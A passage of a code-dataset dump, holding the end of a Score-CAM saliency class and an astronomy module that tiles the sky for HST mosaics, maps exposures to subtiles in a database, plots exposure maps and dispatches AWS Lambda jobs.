self.BatchScoreComputation(mask_batch)\n                score_list[(last_idx+1)*batch_size:] = target_score\n\n\n            score_saliency_map = torch.sum(score_list.reshape(-1, 1, 1, 1)*norm_saliency_maps.cpu(),\n                                           dim=0, keepdim=True)\n\n        score_saliency_map = F.relu(score_saliency_map)\n        score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()
\n\n        if score_saliency_map_min == score_saliency_map_max:\n            return None\n\n        score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data\n        score_saliency_map = score_saliency_map.to(self.device)\n\n        output = self.model_arch(input * score_saliency_map)\n        final_logit = output[0][predicted_class]\n        final_score = F.softmax(output[0], dim=-1)[predicted_class]\n\n        return score_saliency_map.cpu(), final_logit.cpu(), final_score.cpu()\n\n\n\n    def BatchScoreComputation(self, mask_batch: torch.Tensor):\n        with torch.no_grad():\n            mask_batch = mask_batch.to(self.device)\n            logits = self.model_arch(self.input_ * mask_batch)\n            target_score = F.softmax(logits, dim=1)[:, self.class_idx]\n        return target_score.cpu().squeeze(1)\n\n    def __call__(self, input, class_idx=None, retain_graph=False):\n        return self.forward(input, class_idx, retain_graph)\n","repo_name":"sweet-shark/MeTFA-A-Robustness-Evaluation-Framework-for-Feature-Attribution","sub_path":"cam/scorecam.py","file_name":"scorecam.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"39619493643","text":"\"\"\"\nDrizzled mosaics in tiles and subregions\n\nHere the sky is tessellated in 4 degree patches with sizes that are\nincreased slightly to be integer multiples of 512 0.1\" pixels\n\nIndividual subtiles are 256 x 0.1\" = 25.6\"\n\n\"\"\"\nimport os\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom . import db\n\nPIXEL_SCALE = 0.1\n\ndef define_tile_grid(a=4., phase=0.6):\n    \"\"\"\n    Define the tile grid following the PS1 tessellation algorithm from\n    T. Budavari\n    https://outerspace.stsci.edu/display/PANSTARRS/PS1+Sky+tessellation+patterns#PS1Skytessellationpatterns-ProjectioncellsintheRINGS.V3tessellation\n\n    Parameters\n    ----------\n    a : float\n        Tile size in degrees\n\n    phase : float\n        Shift the RA grid by some phase amount to better align tiles with some\n        survey fields\n    \"\"\"\n    import numpy as np\n    from matplotlib import pyplot as plt\n\n    from astropy import units as u\n    import ligo.skymap.plot\n\n    from astropy.coordinates import SkyCoord\n    import astropy.wcs as pywcs\n\n    from grizli import utils\n\n    # bottom of first decl row at d=0\n    dn = [a/2./180*np.pi]\n\n    # lower decl row *centered* on d=0\n    dn = [0] #a/2./180*np.pi]\n\n    # shift up to align survey fields\n    dn = [1./180*np.pi]\n\n    theta = np.arctan(a/180*np.pi/2)*2\n    dn1 = 1\n\n    tn = []\n    mn = []\n\n    dtheta = 1.e-6\n\n    while (dn1 < np.pi/2) & (dn1 > 0):\n        dlo = dn[-1] - theta/2\n        mni = int(np.floor(2*np.pi*np.cos(dlo)/theta)) + 1\n        an = 2*np.pi / mni\n        dn1 = np.arctan(np.tan(dn[-1] + theta/2.)*np.cos(an/2)) + theta/2\n        ddeg = dn1 / np.pi*180\n        niter = 0\n\n        while ddeg < np.round(ddeg):\n            niter += 1\n            _theta = theta + dtheta\n            dlo = dn[-1] - _theta/2\n            _mni = int(np.floor(2*np.pi*np.cos(dlo)/theta)) + 1\n            an = 2*np.pi / mni\n            _dn1 = np.arctan(np.tan(dn[-1] + _theta/2.)*np.cos(an/2)) + _theta/2\n            ddeg = _dn1 / np.pi*180\n            if ddeg < np.round(ddeg):\n                theta = _theta\n                dn1 = _dn1\n                mni = _mni\n\n        mn.append(mni)\n        tn.append(theta)\n\n        if (dn1 < np.pi/2.) 
& (dn1 > 0):\n print(f'{dn[-1]/np.pi*180:.2f} {mni} {niter}')\n dn.append(dn1)\n \n if a == 2:\n dn[-1] = np.pi/2\n mn[-1] = 1\n tn[-1] = theta*2.\n \n elif (a ==4) & (dn[0] == 1./180*np.pi):\n dn[-1] = np.pi/2\n mn[-1] = 1\n tn[-1] = theta*1.5\n \n else:\n dn.append(np.pi/2)\n mn.append(1)\n tn.append(theta)\n\n # Double for negative \n n = len(dn)\n strip = [s for s in range(1, n+1)]\n \n if dn[0] == 0:\n strip = [-s for s in strip[::-1]] + strip[1:]\n dn = [-dni for dni in dn[::-1]] + dn[1:]\n mn = mn[::-1] + mn[1:]\n tn = tn[::-1] + tn[1:]\n else:\n strip = [-s for s in strip[::-1]] + strip\n dn = [-dni for dni in dn[::-1]] + dn\n mn = mn[::-1] + mn\n tn = tn[::-1] + tn\n \n strip = [s for s in range(len(dn))]\n \n # Plot footprints\n import matplotlib.pyplot as plt\n from tqdm import tqdm\n \n kw = {'projection':'astro hours mollweide'}\n kw = {'projection':'astro globe'}\n kw = {'projection':'astro globe', 'center':'0d +70d'}\n \n kw = dict(projection='astro degrees zoom',\n center='0h 86d', radius='10 deg')\n\n #kw = dict(projection='astro degrees zoom',\n # center='0h 0d', radius='6 deg')\n \n plt.close('all')\n fig, ax = plt.subplots(1,1,figsize=(8,8), \n subplot_kw=kw)\n\n #plt.title(\"Aitoff projection of our random data\")\n \n ax.grid()\n \n nedge = 10\n step = np.linspace(0, 1, nedge)\n zeros = np.zeros(nedge)\n px = np.hstack([step, zeros+1, step[::-1], zeros])\n py = np.hstack([zeros, step, zeros+1, step[::-1]])\n \n dpix = []\n da = []\n \n names = ['tile', 'strip', 'nx', \n 'crpix1','crpix2','crval1','crval2','npix',\n 'r1','d1','r2','d2','r3','d3','r4','d4']\n \n rows = []\n tileid = 0\n \n for j in tqdm(range(len(dn))):\n \n ai = 2*np.tan(tn[j]/2)*180/np.pi\n npix = ai*3600/PIXEL_SCALE\n npixr = int(npix // 512 + 1)*512\n ai = npixr*PIXEL_SCALE/3600\n da.append(ai)\n dpix.append(npixr)\n \n ddeg = dn[j]/np.pi*180\n \n h, w = utils.make_wcsheader(ra=0, dec=ddeg, size=ai*3600, \n pixscale=PIXEL_SCALE)\n h['CRPIX1'] += 0.5\n h['CRPIX2'] += 0.5\n \n ras = np.linspace(0, 2*np.pi, np.maximum(mn[j]+1, 1))[:-1]\n \n # Shift to avoid straddling ra=0\n if mn[j] > 1:\n ras += ras[1]*phase\n \n col = 'k'\n \n for ir, r in enumerate(ras):\n h['CRVAL1'] = r/np.pi*180\n h['CRVAL2'] = ddeg\n w = pywcs.WCS(h)\n fp = w.calc_footprint()\n \n tileid += 1\n row = [tileid, strip[j], ir+1]\n for k in ['CRPIX1','CRPIX2','CRVAL1','CRVAL2']:\n row.append(h[k])\n \n row.append(npixr)\n row.extend(fp.flatten().astype(np.float32).tolist())\n rows.append([d for d in row])\n \n #fpx, fpy = w.calc_footprint().T\n #fpx = np.append(fpx, fpx[0])\n #fpy = np.append(fpy, fpy[0])\n fpx, fpy = w.all_pix2world(px*npixr, py*npixr, 0)\n \n if ir > 0:\n pl = ax.plot_coord(SkyCoord(fpx, fpy, unit=('deg','deg')), \n color=col, alpha=0.5, linewidth=1)#, marker='.')\n else:\n pl = ax.plot_coord(SkyCoord(fpx, fpy, unit=('deg','deg')), \n alpha=0.5, linewidth=1)#, marker='.')\n col = pl[0].get_color()\n \n if (j == 42) & (ir == 1):\n for ik in range(5):\n for jk in range(5):\n slx = slice(ik*256, (ik+1)*256)\n sly = slice(jk*256, (jk+1)*256)\n \n wsl = w.slice((sly, slx))\n fpx, fpy = wsl.all_pix2world(px*256, py*256, 0)\n pl = ax.plot_coord(SkyCoord(fpx, fpy, \n unit=('deg','deg')), \n color='k', alpha=0.5, linewidth=1)\n \n tab = utils.GTable(names=names, rows=rows)\n \n return tab\n \n ###### Checking\n df = tab.to_pandas()\n df.to_sql('mosaic_tiles', db._ENGINE, index=False, if_exists='fail', \n method='multi')\n \n # Look at HST fields\n \n avg_coo = db.SQL(\"\"\"SELECT parent, count(parent), \n avg(ra) as ra, 
avg(dec) as dec\n FROM assoc_table where ra > 0\n GROUP by parent order by count(parent)\"\"\")\n \n exp = db.SQL('SELECT assoc, crval1, crval2, footprint FROM exposure_files')\n coo = SkyCoord(exp['crval1'], exp['crval2'], unit=('deg','deg'))\n \n # old\n avg_coo = db.SQL(\"\"\"SELECT parent, count(parent), \n avg(ra) AS ra, avg(dec) as dec \n FROM exposure_log\n WHERE ra > 0 \n AND awspath not like '%%grizli-cosmos-v2%%'\n GROUP by parent order by count(parent)\"\"\")\n \n exp = db.SQL(\"\"\"SELECT parent, ra, dec \n FROM exposure_log \n WHERE ra > 0 \n AND awspath NOT LIKE '%%grizli-cosmos-v2%%'\"\"\")\n \n coo = SkyCoord(exp['ra'], exp['dec'], unit=('deg','deg'))\n \n ra, dec = 150.1, 2.2 # cosmos\n ra, dec = 150.1, 2.2 # cosmos\n \n test = avg_coo['count'] > 20\n test = avg_coo['count'] > 150\n \n for k in np.where(test)[0]:\n print(avg_coo['parent'][k])\n ra, dec = avg_coo['ra'][k], avg_coo['dec'][k]\n \n ctab = utils.GTable()\n ctab['ra'] = [ra]\n ctab['dec'] = dec\n idx, dr = ctab.match_to_catalog_sky(tab, other_radec=('crval1','crval2'))\n \n kw = dict(projection='astro degrees zoom',\n center=f'{ra}d {dec}d', radius='9 deg')\n \n #plt.close('all')\n fig, ax = plt.subplots(1,1,figsize=(8,8), \n subplot_kw=kw)\n \n corners = np.array([np.array(tab[c]) for c in ['r1','d1','r2','d2','r3','d3','r4','d4']])[:,dr < 10*u.deg].T\n \n ax.plot_coord(coo, linestyle='None', marker='.')\n \n for c in corners:\n cc = np.append(c, c[:2])\n ci = SkyCoord(cc[0::2], cc[1::2], unit=('deg','deg'))\n ax.plot_coord(ci, color='k', alpha=0.5, linewidth=1)\n \n ax.grid()\n ax.set_title(avg_coo['parent'][k])\n\n\ndef add_exposure_batch():\n \"\"\"\n Add a bunch of exposures to the `mosaic_tiles_exposures` table\n \"\"\" \n import astropy.table\n import astropy.table\n from tqdm import tqdm\n \n from grizli.aws.tile_mosaic import add_exposure_to_tile_db\n \n filters = db.SQL(\"\"\"SELECT filter, count(filter) \n FROM exposure_files \n GROUP BY filter \n ORDER BY count(filter)\"\"\")\n \n ii = len(filters)-1\n filt = 'F814W'\n \n for ii, filt in enumerate(filters['filter']):\n print(f\"{ii} / {len(filters)} {filt} {filters['count'][ii]}\")\n \n exp = db.SQL(f\"\"\"SELECT eid, assoc, dataset, extension, filter, \n sciext, crval1 as ra, crval2 as dec, footprint\n FROM exposure_files\n WHERE filter = '{filt}'\"\"\")\n \n tiles = db.SQL('select * from mosaic_tiles')\n \n res = [add_exposure_to_tile_db(row=exp[i:i+1], tiles=tiles)\n for i in tqdm(range(len(exp)))]\n \n for j in range(len(res))[::-1]:\n if res[j] is None:\n print(f\"Pop {exp['assoc'][j]} {j}\")\n res.pop(j)\n \n db.execute(f\"\"\"DELETE from mosaic_tiles_exposures t\n USING exposure_files e\n WHERE t.expid = e.eid\n AND filter = '{filt}'\n \"\"\")\n \n N = 100\n for j in tqdm(range(len(res)//N+1)):\n sl = slice(j*N, (j+1)*N)\n #print(j, sl.start, sl.stop)\n \n tab = astropy.table.vstack(res[sl])\n \n df = tab.to_pandas()\n df.to_sql('mosaic_tiles_exposures', db._ENGINE, index=False, \n if_exists='append', method='multi')\n #\n # Table updates\n if 0:\n db.execute('ALTER TABLE exposure_files ADD COLUMN eid SERIAL PRIMARY KEY;')\n\n db.execute('GRANT ALL PRIVILEGES ON ALL TABLEs IN SCHEMA public TO db_iam_user')\n db.execute('GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO db_iam_user')\n db.execute('GRANT SELECT ON ALL TABLEs IN SCHEMA public TO readonly')\n db.execute('GRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO readonly')\n \n db.execute('ALTER TABLE assoc_table ADD COLUMN aid SERIAL PRIMARY KEY;')\n db.execute('CREATE INDEX on 
exposure_files (eid)')\n db.execute('CREATE INDEX on exposure_files (eid,filter)')\n db.execute('CREATE INDEX on mosaic_tiles_exposures (expid)')\n\n db.execute('CREATE INDEX on mosaic_tiles_exposures (tile, subx, suby)')\n \ndef make_exposure_maps():\n \"\"\"\n \"\"\"\n\n from grizli import utils\n from grizli.aws import tile_mosaic\n from grizli.aws import db\n \n filt = 'F160W'\n \n ra, dec, rsize, name = 53.14628, -27.814, 20, 'gds'\n #ra, dec, rsize, name = 189.22592, 62.24586, 20, 'gdn'\n # ra, dec, rsize, name = 214.95, 52.9, 20, 'egs'\n ra, dec, rsize, name = 150.11322, 2.24068, 48, 'cos'\n ra, dec, rsize, name = 34.34984, -5.18390, 30, 'uds'\n \n ra, dec, rsize, name = 177.40124999999998, 22.39947222222, 12, 'macs1149'\n ra, dec, rsize, name = 157.30641, 26.39197, 12, 'sdss1029'\n ra, dec, rsize, name = 215.93, 24.07, 15, 'macs1423'\n ra, dec, rsize, name = 64.39, -11.91, 15, 'macs0417'\n ra, dec, rsize, name = 3.5301941, -30.3854942, 15, 'abell2744'\n extra = ''\n \n fig, tab = tile_mosaic.exposure_map(ra, dec, rsize, name, \n filt=filt.upper(), s0=18, \n extra=extra)\n fig.tight_layout(pad=0.5)\n fig.savefig('/tmp/map.png')\n fig.tight_layout(pad=0.5)\n fig.savefig('/tmp/map.png')\n \n from grizli.aws import db\n mf = db.SQL(\"\"\"\n SELECT * from mosfire_extractions natural join mosfire_datemask\n \"\"\")\n \n # MF with HST\n # SQL = f\"\"\"SELECT m.file, count(m.file)\n # FROM mosfire_extractions m, exposure_files e\n # WHERE ('(' || ra_targ || \n # ', ' || dec_targ || ')')::point\n # <@ polygon(e.footprint)\n # GROUP BY m.file\"\"\"\n # \n # res = db.SQL(SQL) \n \n ###############\n \ndef find_mosaic_segments(bs=16):\n \"\"\"\n \n Find \"segments\" of connected subimages within a tile\n \n bs : bin size relative to 256*0.1\" subimages\n \n \"\"\"\n from scipy.ndimage import label\n\n from grizli import utils\n from grizli.aws import db\n \n cells = db.SQL(f\"\"\"SELECT tile, subx, suby, subra, subdec, filter, \n assoc, dataset, exptime\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n \"\"\")\n \n cells['segment'] = 0\n \n un = utils.Unique(cells['tile'])\n ns = 0\n \n for t in un.values:\n uni = np.where(un[t])[0]\n \n # img = np.zeros((cells['suby'][uni].max()+1, \n # cells['subx'][uni].max()+1), dtype=bool)\n # img[cells['suby'][uni], cells['subx'][uni]] = True\n \n bs = 16\n \n img = np.zeros((cells['suby'][uni].max()//bs+1, \n cells['subx'][uni].max()//bs+1), dtype=bool)\n img[cells['suby'][uni]//bs, cells['subx'][uni]//bs] = True\n \n labeled_array, num_features = label(img)\n \n cells['segment'][uni] = labeled_array[cells['suby'][uni]//bs, \n cells['subx'][uni]//bs] + ns\n \n print(f'tile: {t} npatch: {num_features}')\n \n ns += num_features\n\n \n names = ['tile','patch','ra','dec','jname','count','filter',\n 'xmin','xmax','ymin','ymax',\n 'rmin','rmax','dmin','dmax','status','mtime']\n \n un = utils.Unique(cells['segment'])\n rows = []\n \n import astropy.time\n from tqdm import tqdm\n \n for s in tqdm(un.values):\n uni = np.where(un[s])[0]\n \n unf = utils.Unique(cells['filter'][uni], verbose=False)\n ra = np.mean(cells['subra'][uni])\n dec = np.mean(cells['subdec'][uni])\n jname = utils.radec_to_targname(ra=ra, dec=dec)\n for f in unf.values:\n unfi = cells[uni][unf[f]]\n \n row = [unfi['tile'][0], unfi['segment'][0], \n ra, dec, jname, len(unfi), f, \n unfi['subx'].min(), unfi['subx'].max(), \n unfi['suby'].min(), unfi['suby'].max(), \n unfi['subra'].min(), unfi['subra'].max(), \n unfi['subdec'].min(), unfi['subdec'].max(),\n 0, 
astropy.time.Time.now().mjd]\n            rows.append(row)\n\n    patches = utils.GTable(names=names, rows=rows)\n\n    i = 0\n    t0 = 0\n\n    for i in range(30):\n        t = patches['tile'][i]\n\n        os.system(f\"\"\"aws s3 sync s3://grizli-mosaic-tiles/Tiles/{t}/ ./ --exclude \"*\" --include \"*{patches['filter'][i].lower()}*sci.fits\" \"\"\")\n\n        build_mosaic_from_subregions(root=patches['jname'][i], tile=t,\n                                     files=None,\n                                     filter=patches['filter'][i].lower())\n        #\n        os.system(f'rm tile.{t0:04d}*')\n\n\n\ndef get_axis_center_coord(ax):\n    \"\"\"\n    Get sky coords at the center of a skymap axis\n    \"\"\"\n\n    tr = ax.get_transform('world').inverted()\n    return tr.transform((np.mean(ax.get_xlim()), np.mean(ax.get_ylim())))\n\n\ndef exposures_in_axis(ax, extra_where=\"\"):\n    \"\"\"\n    Query exposure_files\n    \"\"\"\n    coo = get_axis_center_coord(ax)\n\n    point = f\"point '({coo[0]}, {coo[1]})'\"\n\n    res = db.SQL(f\"\"\"SELECT file, filter, assoc from exposure_files\n    WHERE polygon(footprint) @> {point}\n    {extra_where}\n    ORDER BY assoc\n    \"\"\")\n    return res\n\n\ndef exposure_map(ra, dec, rsize, name, filt='F160W', s0=16, cmap='viridis', figsize=(6,6), show_tiles=True, res=None, alpha=1., ec='None', vmin=None, vmax=None, extra=''):\n    \"\"\"\n    Make an exposure map from a database query\n    \"\"\"\n    import ligo.skymap.plot\n    from matplotlib import pyplot as plt\n    import numpy as np\n\n    from astropy.coordinates import SkyCoord\n    from grizli.aws import tile_mosaic\n    from grizli import utils\n\n    cosd = np.cos(dec/180*np.pi)\n\n    if res is None:\n        res = db.SQL(f\"\"\"SELECT tile, subx, suby, subra, subdec, filter,\n                                COUNT(filter) as nexp,\n                                SUM(exptime) as exptime,\n                                MIN(expstart) as tmin,\n                                MAX(expstart) as tmax\n        FROM mosaic_tiles_exposures t, exposure_files e\n        WHERE t.expid = e.eid\n        AND filter = '{filt}'\n        {extra}\n        AND ABS(subra - {ra})*{cosd} < {rsize/60}\n        AND ABS(subdec - {dec}) < {rsize/60}\n        GROUP BY tile, subx, suby, subra, subdec, filter\n        \"\"\")\n\n    kw = dict(projection='astro hours zoom',\n              center=f'{ra}d {dec}d', radius=f'{rsize} arcmin')\n\n    s = np.maximum(s0*18/rsize, 1)\n\n    fig, ax = plt.subplots(1,1,figsize=figsize,\n                           subplot_kw=kw)\n\n    ax.grid()\n\n    coo = SkyCoord(res['subra'], res['subdec'], unit=('deg','deg'))\n    ax.scatter(coo.ra, coo.dec,\n               c=np.log10(res['exptime']),\n               marker='s', s=s,\n               cmap=cmap, alpha=alpha, ec=ec,\n               vmin=vmin, vmax=vmax,\n               transform=ax.get_transform('world'))\n\n    #ax.scatter_coord(coo, c=np.log10(res['exptime']), marker='s', s=s,\n    #              cmap=cmap, alpha=alpha, ec=ec, vmin=vmin, vmax=vmax)\n\n    if show_tiles:\n        for t in np.unique(res['tile']):\n            twcs = tile_mosaic.tile_wcs(t)\n            coo = SkyCoord(*twcs.calc_footprint().T, unit=('deg','deg'))\n            ax.plot_coord(coo, color='r', linewidth=1.2, alpha=0.5)\n\n    # Tile labels\n    un = utils.Unique(res['tile'], verbose=False)\n\n    dp = 512*0.1/3600\n    rp = dp/cosd\n\n    for t in un.values:\n        c = (res['subra'][un[t]].min(), res['subdec'][un[t]].min(),\n             res['subra'][un[t]].max(), res['subdec'][un[t]].max())\n        #\n        cp = (res['subx'][un[t]].min(), res['suby'][un[t]].min(),\n              res['subx'][un[t]].max(), res['suby'][un[t]].max())\n\n        rc = np.array([c[0]-rp, c[0]-rp, c[2]+rp, c[2]+rp, c[0]-rp])\n        dc = np.array([c[1]-dp, c[3]+dp, c[3]+dp, c[1]-dp, c[1]-dp])\n\n        label = f'{t:04d}: {cp[0]:03d} - {cp[2]:03d}, {cp[1]:03d} - {cp[3]:03d}'\n\n        ax.plot_coord(SkyCoord(rc, dc, unit=('deg','deg')),\n                      alpha=0.8, label=label, linewidth=1.2)\n\n    ax.legend()\n\n    ax.set_xlabel('R.A.')\n    ax.set_ylabel('Dec.')\n    ax.set_title(f'{name} - {filt}')\n    \n    
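\n    # Hedged usage sketch (added comment): the values below are copied from\n    # make_exposure_maps above and are illustrative only, not a fixed calling\n    # convention for this function.\n    #   fig, res = exposure_map(150.11322, 2.24068, 48, 'cos', filt='F160W', s0=18)\n    #   fig.savefig('/tmp/map.png')\n    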
#fig.tight_layout(pad=0.8)\n \n return fig, res\n\n\nTILES = None\nTILE_WCS = {}\n\ndef coords_to_subtile(ra=189.0243001, dec=62.19669, size=0):\n \"\"\"\n Get tile/subtile associated with sky coordinates\n \"\"\"\n from grizli import utils\n from astropy.coordinates import SkyCoord\n import astropy.units as u\n \n global TILES, TILE_WCS\n \n if TILES is None:\n print('Initialize TILES')\n \n if os.path.exists('TILES.csv'):\n TILES = utils.read_catalog('TILES.csv')\n else:\n TILES = db.SQL('select * from mosaic_tiles')\n \n TILES['nsub'] = TILES['npix'] // 256\n TILES['coo'] = SkyCoord(TILES['crval1'], TILES['crval2'], \n unit=('deg','deg'))\n \n dr = TILES['coo'].separation(SkyCoord(ra, dec, unit=('deg','deg')))\n in_tile = dr < (2*np.sqrt(2)*u.deg)\n xTILES = TILES[in_tile]\n \n tp = np.array([np.squeeze(tile_wcs(t).all_world2pix([ra], [dec], \n 0)).flatten() \n for t in xTILES['tile']]).T\n \n in_tile = ((tp > 0) & (tp < xTILES['npix'])).sum(axis=0) == 2\n subt = xTILES[in_tile]\n \n subt['fsubx'], subt['fsuby'] = tp[:,in_tile] / 256\n subt['subx'] = subt['fsubx'].astype(int)\n subt['suby'] = subt['fsuby'].astype(int)\n \n ds = size/PIXEL_SCALE/256\n subt['xmin'] = np.clip(subt['fsubx'] - ds, 0, subt['npix']).astype(int)\n subt['xmax'] = np.clip(subt['fsubx'] + ds, 0, subt['npix']).astype(int)\n subt['ymin'] = np.clip(subt['fsuby'] - ds, 0, subt['npix']).astype(int)\n subt['ymax'] = np.clip(subt['fsuby'] + ds, 0, subt['npix']).astype(int)\n \n subt['ncut'] = (subt['xmax'] - subt['xmin'] + 1)\n subt['ncut'] *= (subt['ymax'] - subt['ymin'] + 1)\n so = np.argsort(subt['ncut'])\n \n return subt[so]\n\n\ndef cutout_from_coords(output='mos-{tile}-{filter}_{drz}', ra=189.0243001, dec=62.1966953, size=10, filters=['F160W'], theta=0, clean_subtiles=False, send_to_s3=False, make_weight=True, **kwargs): \n \n subt = coords_to_subtile(ra=ra, dec=dec, size=size)[0]\n \n ll = (subt['xmin'], subt['ymin'])\n ur = (subt['xmax'], subt['ymax'])\n \n resp = []\n for filt in filters:\n ri = build_mosaic_from_subregions(root=output, \n tile=subt['tile'], files=None, \n filter=filt, \n ll=ll, ur=ur,\n clean_subtiles=clean_subtiles, \n make_weight=make_weight,\n send_to_s3=send_to_s3)\n resp.append(ri)\n \n return resp\n\n\ndef add_exposure_to_tile_db(dataset='ibev8xubq', sciext=1, tiles=None, row=None):\n \"\"\"\n Find subtiles that overlap with an exposure in the `exposure_files`\n table\n \"\"\"\n import astropy.table\n import astropy.units as u\n import astropy.wcs as pywcs\n \n import numpy as np\n from grizli import utils\n \n global TILES\n \n if TILES is None:\n TILES = db.SQL('select * from mosaic_tiles')\n \n if tiles is None:\n tiles = TILES\n\n if row is None:\n row = db.SQL(f\"\"\"SELECT eid, assoc, dataset, extension, filter, \n sciext, crval1 as ra, crval2 as dec, footprint \n from exposure_files\n where filter = 'F160W' \n and dataset = '{dataset}' \n AND sciext={sciext}\"\"\")\n \n if len(row) == 0:\n print(f'No exposure data found for dataset={dataset} sciext={sciext}')\n return None\n \n idx, dr = row.match_to_catalog_sky(tiles, other_radec=('crval1','crval2'))\n \n tix = np.where(dr < 4*np.sqrt(2)*u.deg)[0]\n #tix = np.where(dr < 4*u.deg)[0]\n \n exp_poly = None\n for fp in row['footprint']:\n sr = utils.SRegion(fp)\n sra = sr.xy[0][:,0]\n if (sra.min() < 10) & (sra.max() > 350):\n sra[sra > 350] -= 360\n \n sr.xy[0][:,0] = sra\n \n for p, s in zip(sr.get_patch(alpha=0.5, color='k'), sr.shapely):\n if exp_poly is None:\n exp_poly = s\n else:\n exp_poly = exp_poly.union(s)\n \n # 
ax.add_patch(p)\n \n sbuff = utils.SRegion(np.array(exp_poly.buffer(1./60).boundary.xy).T)\n \n tabs = []\n \n for t in tix:\n \n h, w = utils.make_wcsheader(ra=tiles['crval1'][t], \n dec=tiles['crval2'][t],\n size=tiles['npix'][t]*PIXEL_SCALE, \n pixscale=PIXEL_SCALE)\n \n h['CRPIX1'] += 0.5\n h['CRPIX2'] += 0.5\n h['LATPOLE'] = 0.\n \n w = pywcs.WCS(h)\n wfp = w.calc_footprint()\n wra = wfp[:,0]\n if (wra.min() < 10) & (wra.max() > 350):\n if sr.centroid[0][0] < 10:\n wra[wra > 350] -= 360\n else:\n wra[wra < 10] += 360\n \n wfp[:,0] = wra\n \n srt = utils.SRegion(wfp)\n \n if not sr.shapely[0].intersects(srt.shapely[0]):\n continue\n \n nsub = tiles['npix'][t]//256\n step = np.arange(nsub)\n px, py = np.meshgrid(step, step)\n px = px.flatten()\n py = py.flatten()\n rd = w.all_pix2world(px*256+128, py*256+128, 0)\n pts = np.array([rd[0], rd[1]]).T\n test = sbuff.path[0].contains_points(pts)\n tw = np.where(test)[0]\n if test.sum() == 0:\n continue\n \n for j, xi, yi in zip(tw, px[tw], py[tw]):\n wsl = w.slice((slice(yi*256, (yi+1)*256), \n slice(xi*256, (xi+1)*256)))\n sw = utils.SRegion(wsl.calc_footprint())\n test[j] = sw.shapely[0].intersects(exp_poly)\n \n if test.sum() == 0:\n continue\n \n tmatch = utils.GTable()\n tmatch['tile'] = [tiles['tile'][t]] * test.sum()\n tmatch['subx'] = px[test]\n tmatch['suby'] = py[test]\n tmatch['subra'] = rd[0][test]\n tmatch['subdec'] = rd[1][test]\n tmatch['expid'] = np.unique(row['eid'])[0]\n # tmatch['eassoc'] = np.unique(row['assoc'])[0]\n # tmatch['edataset'] = np.unique(row['dataset'])[0]\n # tmatch['eext'] = np.unique(row['sciext'])[0]\n tmatch['in_mosaic'] = 0\n tabs.append(tmatch)\n \n if len(tabs) > 0:\n tmatch = astropy.table.vstack(tabs)\n return tmatch\n else:\n return None\n\n\ndef tile_wcs(tile):\n \"\"\"\n Compute tile WCS\n \"\"\"\n import astropy.wcs as pywcs\n from grizli import utils\n from grizli.aws import db\n \n global TILES, TILE_WCS\n if TILES is None:\n TILES = db.SQL('select * from mosaic_tiles')\n \n if tile not in TILES['tile']:\n print(f'{tile} not in `mosaic_tiles`')\n return None\n \n if tile in TILE_WCS:\n return TILE_WCS[tile]\n \n row = TILES[TILES['tile'] == tile]\n \n # row = db.SQL(f\"\"\"SELECT crval1, crval2, npix\n # FROM mosaic_tiles\n # WHERE tile={tile}\"\"\")\n\n t = 0\n h, w = utils.make_wcsheader(ra=row['crval1'][t], dec=row['crval2'][t],\n size=row['npix'][t]*PIXEL_SCALE,\n pixscale=PIXEL_SCALE)\n \n # h['CRPIX1'] += 0.5\n # h['CRPIX2'] += 0.5\n h['LATPOLE'] = 0.\n \n wcs = pywcs.WCS(h)\n wcs.pscale = PIXEL_SCALE\n \n TILE_WCS[tile] = wcs\n \n return wcs\n \n \ndef tile_subregion_wcs(tile, subx, suby):\n \"\"\"\n Compute WCS for a tile subregion\n \"\"\"\n \n twcs = tile_wcs(tile)\n \n sub_wcs = twcs.slice((slice(suby*256, (suby+1)*256), \n slice(subx*256, (subx+1)*256)))\n sub_wcs.pscale = PIXEL_SCALE\n return sub_wcs\n\n\n#\ndef get_lambda_client(region_name='us-east-1'):\n \"\"\"\n Get boto3 client in same region as HST public dataset\n \"\"\"\n import boto3\n session = boto3.Session()\n client = session.client('lambda', region_name=region_name)\n return client\n\n\ndef send_event_lambda(event, verbose=True, client=None, func='grizli-mosaic_tile'):\n \"\"\"\n Send a single event to AWS lambda\n \"\"\"\n import time\n import os\n import yaml\n\n import numpy as np\n import boto3\n import json\n\n if client is None:\n client = get_lambda_client(region_name='us-east-1')\n\n if verbose:\n print('Send event to {0}: {1}'.format(func, event))\n\n response = client.invoke(FunctionName=func,\n 
InvocationType='Event', LogType='Tail',\n                             Payload=json.dumps(event))\n\n\ndef count_locked():\n    \"\"\"\n    Count number of distinct locked tiles that could still be running\n    on aws lambda\n    \"\"\"\n    tiles = db.SQL(\"\"\"SELECT tile, subx, suby, filter, count(filter)\n    FROM mosaic_tiles_exposures t, exposure_files e\n    WHERE t.expid = e.eid AND tile != 1183\n    AND in_mosaic=9\n    GROUP BY tile, subx, suby, filter\n    ORDER BY count(filter) DESC\"\"\")\n\n    return len(tiles), tiles\n\n\ndef reset_locked():\n    \"\"\"\n    Reset in_mosaic 9 -> 0 for tiles that may have timed out\n    \"\"\"\n    cmd = \"\"\"UPDATE mosaic_tiles_exposures\n    SET in_mosaic = 0 WHERE in_mosaic = 9\"\"\"\n\n    db.execute(cmd)\n\n\ndef get_subtile_status(tile=2530, subx=522, suby=461, **kwargs):\n    \"\"\"\n    `in_mosaic` status of all entries of a subtile\n    \"\"\"\n    resp = db.SQL(f\"\"\"SELECT tile, subx, suby, filter,\n                             in_mosaic, count(filter)\n    FROM mosaic_tiles_exposures t, exposure_files e\n    WHERE t.expid = e.eid\n    AND tile={tile} AND subx={subx} AND suby={suby}\n    GROUP BY tile, subx, suby, filter, in_mosaic\n    ORDER BY (filter, in_mosaic)\n    \"\"\")\n    return resp\n\n\ndef reset_tiles_in_assoc(assoc):\n    \"\"\"\n    Reset in_mosaic status for all subtiles overlapping with an assoc\n    \"\"\"\n    res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n    SET in_mosaic = 0\n    FROM (select tile, subx, suby\n          from mosaic_tiles_exposures ti, exposure_files e\n          where ti.expid = e.eid AND e.assoc = '{assoc}'\n          group by tile, 